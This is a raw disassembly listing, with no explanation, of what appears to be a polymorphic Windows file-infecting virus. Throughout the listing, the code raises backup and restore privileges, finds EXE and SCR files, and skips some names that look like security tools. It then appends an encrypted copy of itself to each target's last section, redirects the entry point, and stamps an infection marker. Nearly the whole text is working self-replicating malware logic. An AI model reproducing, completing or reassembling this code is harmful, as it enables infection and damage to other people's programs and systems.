cmp [ebp+1042F4h], edi
jnz short loc_4900D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_49007F
cmp eax, [ebp+10431Ch]
jb short loc_4900E8
loc_49007F: ; CODE XREF: sub_4900AA-35�j
cmp eax, 70000000h
jb short loc_4900BD
call sub_4900AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_4900A9
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_4900C4
; ---------------------------------------------------------------------------
locret_4900A9: ; CODE XREF: sub_4900AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_4900AA
; =============== S U B R O U T I N E =======================================
sub_4900AA proc near ; CODE XREF: sub_4900AA-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 0048FF8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call sub_48F51B
popa
loc_4900BD: ; CODE XREF: sub_4900AA-26�j
test eax, 80000000h
jnz short loc_4900D2
loc_4900C4: ; CODE XREF: sub_4900AA-3�j
sub eax, [edi+0Ch]
jb short loc_4900D2
cmp eax, [edi+8]
jb loc_49000E
loc_4900D2: ; CODE XREF: sub_4900AA-F9�j
; sub_4900AA-EB�j ...
dec ecx
jnz loc_48FF8B
loc_4900D9: ; CODE XREF: sub_48FEF1+9�j
; fuck:0048FF73�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_49012A
; ---------------------------------------------------------------------------
loc_4900E8: ; CODE XREF: sub_4900AA-7F�j
; sub_4900AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_49012A: ; CODE XREF: sub_4900AA+3C�j
pop edi
pop esi
retn
sub_4900AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_49012D proc near ; CODE XREF: fuck:0049042E�p
; FUNCTION CHUNK AT 00490257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_490257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_490257
call sub_48E5AF
call near ptr loc_490168+5
push ebx
db 65h
jz short near ptr unk_4901A6
imul ebp, [ebp+53h], 72756365h
loc_490168: ; CODE XREF: sub_49012D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_49012D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_49019C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_490203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_49019C: ; CODE XREF: fuck:0049017F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ;
db 13h
db 0
unk_4901A6 db 0 ; CODE XREF: sub_49012D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0Bh
db 0E8h ;
db 0FFh
db 0FFh
db 0E8h ;
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0EEh ;
db 0E7h ;
db 0FFh
db 0FFh
db 0E8h ;
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0CBh ;
db 0E7h ;
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_490203: ; CODE XREF: fuck:0049018D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_49012D
loc_490257: ; CODE XREF: sub_49012D+A�j
; sub_49012D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_49012D
; =============== S U B R O U T I N E =======================================
sub_490259 proc near ; CODE XREF: fuck:00490427�p
; fuck:00490433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_49032A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_49032A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_4908AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_49089F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_49089F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_49089F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_490877
mov [ebp+1042B4h], eax
locret_49032A: ; CODE XREF: sub_490259+10�j
; sub_490259+27�j ...
retn
sub_490259 endp
; ---------------------------------------------------------------------------
loc_49032B: ; CODE XREF: sub_49045B+188�p
; sub_49045B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ;
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_490370 proc near ; CODE XREF: sub_49045B:loc_4904D0�p
; sub_49045B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_490375: ; CODE XREF: sub_490370+23�j
jecxz short locret_4903AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_4903AC
cmp dword ptr [edx+0Ch], 1
jb short loc_490375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_4903AC: ; CODE XREF: sub_490370:loc_490375�j
; sub_490370+1D�j ...
retn
sub_490370 endp
; =============== S U B R O U T I N E =======================================
sub_4903AD proc near ; CODE XREF: fuck:00490445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_4903AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4903BA: ; CODE XREF: fuck:004903DB�j
mov ecx, edi
jmp short loc_4903C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_4903C5: ; CODE XREF: fuck:004903D7�j
mov ebx, edi
xor ecx, ecx
loc_4903C9: ; CODE XREF: fuck:004903BC�j
; fuck:004903DF�j
lodsb
cmp al, 61h
jb short loc_4903D4
cmp al, 7Ah
ja short loc_4903D4
sub al, 20h
loc_4903D4: ; CODE XREF: fuck:004903CC�j
; fuck:004903D0�j
stosb
cmp al, 5Ch
jz short loc_4903C5
cmp al, 2Eh
jz short loc_4903BA
cmp al, 0
jnz short loc_4903C9
jecxz short locret_4903AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_4903F7
cmp eax, 524353h
jnz locret_49032A
loc_4903F7: ; CODE XREF: fuck:004903EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_49032A
cmp eax, 4E554357h
jz locret_49032A
cmp eax, 32334357h
jz locret_49032A
cmp eax, 4F545350h
jz locret_49032A
xor ebx, ebx
call sub_490259
jnz short loc_49043E
call sub_49012D
call sub_490259
jz locret_49032A
loc_49043E: ; CODE XREF: fuck:0049042C�j
xor edx, edx
call sub_49045B
call sub_4903AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_490855
; =============== S U B R O U T I N E =======================================
sub_49045B proc near ; CODE XREF: fuck:00490440�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_490855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_490855
test dword ptr [ebx+16h], 2000h
jnz loc_490855
test byte ptr [ebx+5Ch], 2
jz loc_490855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_490855
cmp eax, 20202020h
jz loc_490855
mov ecx, [ebx+0C8h]
jecxz short loc_4904D0
push ecx
call sub_48F414
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_4904D0: ; CODE XREF: sub_49045B+5D�j
call sub_490370
jb loc_490855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_4904F0
xor eax, eax
jmp short loc_4904F5
; ---------------------------------------------------------------------------
loc_4904F0: ; CODE XREF: sub_49045B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_4904F5: ; CODE XREF: sub_49045B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_48EB50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_490517: ; CODE XREF: sub_49045B+D5�j
push 20h
dec cl
pop eax
js short loc_490532
call near ptr dword_48EB50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_490517
; ---------------------------------------------------------------------------
loc_490532: ; CODE XREF: sub_49045B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_490560
test dword ptr [ebp+1039C0h], 3
jnz short loc_490556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_490560
; ---------------------------------------------------------------------------
loc_490556: ; CODE XREF: sub_49045B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_490560: ; CODE XREF: sub_49045B+E1�j
; sub_49045B+F9�j ...
push 6
pop ecx
loc_490566: ; CODE XREF: sub_49045B+129�j
push 6
pop eax
call near ptr dword_48EB50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_490566
test dword ptr [ebp+1039C0h], 8
jnz short loc_49059B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_490560
loc_49059B: ; CODE XREF: sub_49045B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_4905C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_490560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_490560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_490560
loc_4905C2: ; CODE XREF: sub_49045B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_4905D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_490560
loc_4905D7: ; CODE XREF: sub_49045B+171�j
and dword ptr [ebp+104300h], 0
call loc_48F855
call loc_49032B
call sub_49085E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_490259
jz loc_490855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_490370
jb loc_490855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_49064B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_49064B: ; CODE XREF: sub_49045B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_49065F
rep movsb
loc_49065F: ; CODE XREF: sub_49045B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_49071D
push dword ptr [ebx+28h]
call sub_48F414
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_49071D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_49069C
xor ecx, ecx
loc_49069C: ; CODE XREF: sub_49045B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_490703
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_4906DC
neg dword ptr [eax]
loc_4906DC: ; CODE XREF: sub_49045B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_4906FA
neg dword ptr [eax]
loc_4906FA: ; CODE XREF: sub_49045B+29B�j
push ecx
call loc_49032B
pop ecx
jmp short loc_49070F
; ---------------------------------------------------------------------------
loc_490703: ; CODE XREF: sub_49045B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_49070F: ; CODE XREF: sub_49045B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_49071D: ; CODE XREF: sub_49045B+20E�j
; sub_49045B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_490736
imul edx, 12345678h
loc_490736: ; CODE XREF: sub_49045B+2D3�j
mov [eax-19h], dx
call sub_48E120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_490768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_490768: ; CODE XREF: sub_49045B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_490784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_490784: ; CODE XREF: sub_49045B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_490797
push edx
call sub_48FEF1
pop edx
loc_490797: ; CODE XREF: sub_49045B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_4907A4
mov [ebx+28h], ecx
jmp short loc_4907B1
; ---------------------------------------------------------------------------
loc_4907A4: ; CODE XREF: sub_49045B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_4907AE
jmp short loc_4907B1
; ---------------------------------------------------------------------------
loc_4907AE: ; CODE XREF: sub_49045B+34F�j
mov ecx, [ebx+28h]
loc_4907B1: ; CODE XREF: sub_49045B+347�j
; sub_49045B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_4907D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_4907D1: ; CODE XREF: sub_49045B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_4907E2
mov [edx+8], ecx
loc_4907E2: ; CODE XREF: sub_49045B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_490813
add ecx, [ebp+101069h]
loc_490813: ; CODE XREF: sub_49045B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_490835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_490835
mov dh, [ebp+1039BFh]
loc_490835: ; CODE XREF: sub_49045B+3C4�j
; sub_49045B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_49084C
loc_490841: ; CODE XREF: sub_49045B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_490841
jmp short loc_490855
; ---------------------------------------------------------------------------
loc_49084C: ; CODE XREF: sub_49045B+3E4�j
; sub_49045B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_49084C
loc_490855: ; CODE XREF: fuck:00490456�j
; sub_49045B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_49045B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_49085E proc near ; CODE XREF: sub_49045B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_49032A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_490877: ; CODE XREF: sub_490259+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_49089F: ; CODE XREF: sub_490259+6B�j
; sub_490259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_4908AB: ; CODE XREF: sub_490259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_49085E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 2070103h, 81A80605h
dd 0F627FF40h, 0FFE7B9E8h, 0FF8B80FFh, 0DB87DB87h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_4909E4
nop
call near ptr dword_490A98
clc
jmp loc_490A19
; =============== S U B R O U T I N E =======================================
sub_4909E4 proc near ; CODE XREF: fuck:004909D3�p
push dword ptr fs:0
add dword ptr ds:loc_47C6AA+4, ebp
mov ecx, ecx
mov fs:0, esp
xor eax, eax
push eax
push eax
push eax
push eax
push 4000h
push 200h
push 20h
push 10000h
push eax
call ds:dword_47C039 ; GetProcAddress
loc_490A19: ; CODE XREF: fuck:004909DF�j
mov eax, eax
nop
mov ecx, ecx
sub eax, eax
loc_490A20: ; CODE XREF: sub_4909E4+42�j
dec al
or al, al
jz short loc_490A2A
jnz short loc_490A20
jmp short near ptr byte_490A91
; ---------------------------------------------------------------------------
loc_490A2A: ; CODE XREF: sub_4909E4+40�j
nop
jmp short $+2
stc
sub ebx, ebx
sub ecx, ecx
cld
mov cl, 93h
mov edx, edx
stc
xchg ebx, ebx
stc
loc_490A3B: ; CODE XREF: sub_4909E4+5B�j
lea ebx, [ebx+1]
stc
loop loc_490A3B
stc
call loc_490A5A
mov al, [edi]
nop
mov ebx, ebx
clc
xor ax, bx
clc
cmc
xchg al, [edi]
clc
xchg ebx, ebx
retn
sub_4909E4 endp
; ---------------------------------------------------------------------------
db 89h, 0C0h
; ---------------------------------------------------------------------------
loc_490A5A: ; CODE XREF: sub_4909E4+5E�p
pop edi
nop
cld
add edi, 9991h
push edi
xor [eax], eax
; ---------------------------------------------------------------------------
dw 0
dd 0Ah dup(0)
db 0
byte_490A91 db 3 dup(0) ; CODE XREF: sub_4909E4+44�j
align 8
dword_490A98 dd 0E6h dup(0) dd offset aTdTdWidthDCode+14h
aAsenamedobject:
unicode 0, <aseNamedObjects\VtSect>,0
dw 9B47h
dd 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 0
dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 0ABDE7C80h
dd 153C7C80h, 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h
dd 5DCA7C86h, 11DA7C83h, 2ADE7C81h, 1BA57C81h, 1D777C82h
dd 0B9057C80h, 0BB767C80h, 9E17C80h, 3DE57C83h, 3F587C86h
dd 27827C86h, 1CB87C81h, 24427C83h, 0B1C7C80h, 0B9747C81h
dd 9A517C80h, 0D877C80h, 0D4607C81h, 0D6827C90h, 0D7547C90h
dd 0D7697C90h, 0D7937C90h, 7C90h, 0DC550000h, 0DCFD7C90h
dd 0DD907C90h, 0DDBA7C90h, 0DEB67C90h, 0E0457C90h, 0EA327C90h
dd 30C67C90h, 7C91h, 14h dup(0)
dd 320030h, 490F8Ch, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 740056h
dd 650053h, 740063h, 0D3h dup(0)
dd offset loc_48E000
dd 133Dh dup(0)
fuck ends
; Section 5. (virtual address 00096000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00096000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 496000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start